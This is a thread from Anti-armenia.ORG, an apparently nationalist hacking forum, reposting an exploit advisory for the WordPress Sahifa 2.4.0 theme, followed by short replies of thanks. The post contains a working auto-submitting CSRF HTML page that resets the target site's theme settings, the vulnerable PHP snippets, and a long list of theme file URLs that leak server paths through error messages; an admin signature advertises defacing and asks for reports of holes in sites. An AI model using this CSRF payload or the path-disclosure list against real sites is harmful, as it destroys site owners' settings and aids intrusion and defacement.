Anti-armenia.ORG - Forumlar - WordPress Sahifa 2.4.0 Cross Site Request Forgery / Path Disclos

Forumlar / Hacking Platform / Exploits & Vulnerabilities / WordPress Sahifa 2.4.0 Cross Site Request Forgery / Path Disclos

Istifadəçi

2013-01-10 23:29 GMT

BlackMinD

Pr0grammer

Mesaj Sayı : 1677

Mövzu Sayı :

Rep Ver :

Rep Sayı : 62

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : KARABAKH IS AZERBAIJAN!

Ölkə :

Məslək :

Yaş :

Mesaj :

Salamlar) Dedim forumu biraz cana gətirək)
http://packetstorm.interhost.co.il/1301-exploits/wpsahifa-xsrfdisclose.txt

Kod:
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm AkaStep member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

============================================
Software: Wordpress Sahifa theme Version: 2.4.0
Vendor: http://themes.tielabs.com/
Software License: Shareware *cost $45*
Vulnerabilities: This software is prone to CSRF and FULL PATH DISCLOSURE vulnerabilities.
============================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
============================================

[*] CSRF VULNERABILITY [*]

The following CSRF exploit on successfully exploitation will "reset" site settings.
Be Careful: It will lead to data destruction (you will lost your site settings)

Here is that vulnerable code sections:

File: panel/mpanel-ui.php
==SECTION 1=========BEGIN SNIP=================

<form method="post">
<div class="mpanel-reset">
<input name="reset" class="mpanel-reset-button" type="submit"
onClick="if(confirm('All settings will be rest .. Are you sure ?')) return true ; else return false; " value="Reset Settings" />
<input type="hidden" name="action" value="reset" />
</div>
</form>
=================== END SNIP =====================

File: panel/mpanel-functions.php

===SECTION 2=======BEGIN SNIP===================

if( isset( $_REQUEST['action'] ) ){
if( 'reset' == $_REQUEST['action'] ) {
global $default_data;
tie_save_settings( $default_data );
header("Location: admin.php?page=panel&reset=true");
die;
}
}
=============== END SNIP =====================

============ BEGIN CSRF EXPLOIT ============
<h1>Wordpress sahifa theme CSRF exploit By AkaStep<br></h1>

<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://hacker1.own/wp/wp-admin/admin.php?page=panel&reset=true">
<input type="hidden" name="action" value="reset" />

</form>

============ END OF CSRF EXPLOIT ============

[*] FULL PATH DISCLOSURE: [*]

Just Direct access:

http://hacker1.own/wp/wp-content/themes/sahifa/category.php

Fatal error: Call to undefined function get_header() in /etc/apache2/htdocs/hacker1/wp/wp-content/themes/sahifa/category.php on line 1

Other files also disclosures similar info.

Here is that files:

http://hacker1.own/wp/wp-content/themes/sahifa/panel/shortcodes/shortcode.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/shortcodes/ui.php

http://hacker1.own/wp/wp-content/themes/sahifa/panel/shortcodes/ui.php?page[]=

Warning: htmlentities() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/wp/wp-content/themes/sahifa/panel/shortcodes/ui.php on line 2

http://hacker1.own/wp/wp-content/themes/sahifa/panel/post-options.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/notifier/update-notifier.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/custom-slider.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/mpanel-functions.php
http://hacker1.own/wp/wp-content/themes/sahifa/sidebar-footer.php
http://hacker1.own/wp/wp-content/themes/sahifa/author.php

http://hacker1.own/wp/wp-content/themes/sahifa/index.php
Fatal error: Call to undefined function get_header() in /etc/apache2/htdocs/hacker1/wp/wp-content/themes/sahifa/index.php on line 1

http://hacker1.own/wp/wp-content/themes/sahifa/search.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions.php
http://hacker1.own/wp/wp-content/themes/sahifa/footer.php
http://hacker1.own/wp/wp-content/themes/sahifa/comments.php
http://hacker1.own/wp/wp-content/themes/sahifa/archive.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/widgetize-theme.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/common-scripts.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/theme-functions.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/updates.php
http://hacker1.own/wp/wp-content/themes/sahifa/page.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-sitemap.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-login.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-tags.php
http://hacker1.own/wp/wp-content/themes/sahifa/single.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-related.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-share.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-news-pic.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-google.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-custom-author.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-posts.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-text-html.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-feedburner.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-ads.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-flickr.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-video.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-tabbed.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-author.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-search.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-social.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-twitter.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-facebook.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-reviews.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-counter.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-category.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-login.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-comments-avatar.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/slider.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-head.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-meta.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/slider-category.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/single-post-share.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/breaking-news.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-timeline.php
http://hacker1.own/wp/wp-content/themes/sahifa/loop.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-feed.php
http://hacker1.own/wp/wp-content/themes/sahifa/tag.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-restrict.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-blog.php
http://hacker1.own/wp/wp-content/themes/sahifa/404.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-authors.php
http://hacker1.own/wp/wp-content/themes/sahifa/sidebar.php

=========================== HAPPY NEW YEAR! ==================================

================================================
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep

Ana VƏTƏN!

Anti-armenia.ORG

Istifadəçi

2013-01-11 00:33 GMT

ymfo

Banned

Mesaj Sayı : 32

Mövzu Sayı :

Rep Ver :

Rep Sayı : 0

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər :

Ölkə :

Məslək :

Yaş : 32

Mesaj :

təbriklər

Anti-armenia.ORG

Istifadəçi

2013-01-11 15:32 GMT

M4NY3T!K

Gold

Mesaj Sayı : 606

Mövzu Sayı :

Rep Ver :

Rep Sayı : 7

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : Naxçıvan

Ölkə :

Məslək :

Yaş :

Mesaj :

Gözəl Bro, Təşəkkürlər

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png

Anti-armenia.ORG

Istifadəçi

2013-01-11 18:57 GMT

Ferid23

Admin

Mesaj Sayı : 1875

Mövzu Sayı :

Rep Ver :

Rep Sayı : 45

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : Anti-armenia.ORG

Ölkə :

Məslək : Programmer & Defacer

Yaş : 12

Mesaj :

Əla , Təşəkkülər!

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)

Anti-armenia.ORG